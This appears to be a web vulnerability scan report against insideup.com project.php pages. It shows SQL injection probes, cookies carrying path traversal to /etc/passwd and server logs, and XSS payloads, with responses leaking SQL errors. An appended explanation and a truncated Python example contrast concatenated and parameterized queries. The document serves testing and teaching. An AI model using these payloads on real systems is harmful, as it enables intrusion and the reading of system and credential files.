select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR 
prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 5
/ppc/leadflow/fist00/project.php

http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 10003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kamplcfjfl53r422q4kc5hb4k0; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select 
chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR 
prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&' at line 5
/ppc/leadflow/weho00/project.php

http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 20003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=skd6av0kd4gohuimjahqaje553; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select 
chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR 
prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&' at line 5
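Both project.php entries above show the same thing: the iusrc value lands inside the project_page_url = '...' comparison of a five-table UNION, the statement fails to parse, and the application writes the whole statement followed by the MySQL error text into the response body. That echo is what confirms the injection, and it also hands an attacker the table and column names for free. The following Python example is added here and is not code from insideup.com or from Netsparker; it reconstructs the query-building pattern the echoed SQL implies against an in-memory SQLite database (SQLite stands in for MySQL, the schema is cut down to one lead_flow_one_pages_details table with only the selected columns, and the single row is constructed) and puts the parameterized form beside it. SQLite rejects the probe for a different reason than MySQL did (chr() is not a SQLite function), but the contrast is the same: with string concatenation the request value becomes part of the SQL grammar and the error carries the statement back to the client; with bound parameters the same probe is just a string that matches no row.

```python
import sqlite3

# Constructed stand-in for the site's database: SQLite instead of MySQL, one of
# the lead_flow_*_pages_details tables reduced to the columns the echoed query
# selects, with one made-up row. None of this is taken from the target.
SCHEMA = """
CREATE TABLE lead_flow_one_pages_details (
    catId INTEGER, groupId INTEGER, templateId INTEGER, project_page_url TEXT
);
INSERT INTO lead_flow_one_pages_details VALUES
    (10003, 1, 1, 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc');
"""
# The row inserted above, as sqlite3 returns it.
SAMPLE_ROW = (10003, 1, 1, "leadflow/fist00/project.php?catId=10003&iusrc=iupsc")

# The iusrc probe from the fist00 entry, as the scanner sent it (URL-decoded).
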